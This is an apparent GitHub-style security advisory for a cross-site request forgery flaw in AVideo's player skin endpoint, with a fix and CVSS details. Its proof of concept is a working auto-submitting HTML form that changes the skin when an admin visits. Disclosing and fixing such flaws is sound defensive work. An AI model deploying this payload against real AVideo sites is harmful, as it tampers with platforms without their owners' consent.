AVideo: CSRF on Player Skin Configuration via admin/playerUpdate.json.php

Description

Severity: Medium
CWE: CWE-352 (Cross-Site Request Forgery)

Summary

The player skin configuration endpoint at admin/playerUpdate.json.php does not validate CSRF tokens. The plugins table is explicitly excluded from the ORM's domain-based security check via ignoreTableSecurityCheck(), removing the only other layer of defense. Combined with SameSite=None cookies, a cross-origin POST can modify the video player appearance on the entire platform.

Details

In admin/playerUpdate.json.php at line 17, the player skin is set directly from POST data:

$pluginDO->skin = $_POST['skin'];

No CSRF token is validated anywhere in the endpoint. Normally, the ORM layer performs a Referer/Origin domain check as a secondary defense against cross-origin writes. However, the plugins table is registered in ignoreTableSecurityCheck(), which explicitly bypasses this ORM-level protection for plugin configuration.

AVideo's session cookies are configured with SameSite=None, meaning the admin's authenticated session cookie is automatically included in cross-origin POST requests from any website.

An attacker can craft a page that, when visited by an authenticated admin, silently changes the player skin to any value, including potentially invalid or disruptive configurations.

Proof of Concept

Host the following HTML on an attacker-controlled domain:

<!DOCTYPE html>
<html>
<head><title>CSRF Player Skin</title></head>
<body>
<h1>Loading video...</h1>
<form id="csrf" method="POST"
      action="https://your-avideo-instance.com/admin/playerUpdate.json.php">
  <input type="hidden" name="skin" value="minimalist" />
</form>
<script>
  document.getElementById("csrf").submit();
</script>
</body>
</html>

When an authenticated admin visits this page, the platform's player skin is changed without their knowledge.

Impact

  • Platform-wide player appearance modification without admin consent
  • Potential disruption of video playback if an invalid skin value is set
  • The ORM security bypass via ignoreTableSecurityCheck() means there is no fallback protection
  • Can be used as part of a broader defacement or social engineering attack

Recommended Fix

Add CSRF token validation at admin/playerUpdate.json.php, before processing POST data:

// admin/playerUpdate.json.php (before line 17)
if (!isGlobalTokenValid()) {
    die('{"error":"Invalid CSRF token"}');
}

Found by aisafe.io

Basic information

Type
reviewed
Severity
medium
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2026-04-03 23:43:23 UTC
Updated
2026-04-06 23:43:21 UTC
GitHub reviewed
2026-04-03 23:43:23 UTC
NVD published
2026-04-06

EPSS Score

Score Percentile
0.02% 4.61%

CVSS Scores

Base score Version Severity Vector
4.3 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:L)
Once they can reach the bug, pulling it off is straightforward—no weird race conditions or rare setup.
Privileges required (PR:N)
No account or special rights needed—anonymous or random user is enough.
User interaction (UI:R)
A real person has to do something—click, install, enable—otherwise it doesn’t land.
Scope (S:U)
Damage stays in the same “trust bubble” as the broken component—no big spill into unrelated systems.
Confidentiality (C:N)
Doesn’t really leak secrets in a meaningful way.
Integrity (I:L)
Attackers could change some data, but it’s limited—not everything goes.
Availability (A:N)
Service keeps running; no real outage angle.

Identifiers

CWEs

CWE id Name
CWE-352 Cross-Site Request Forgery (CSRF)

Credits

  • adrgs (reporter)
  • aisafe-bot (finder)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
composer wwbn/avideo <= 26.0

References

cvelogic Threat Intelligence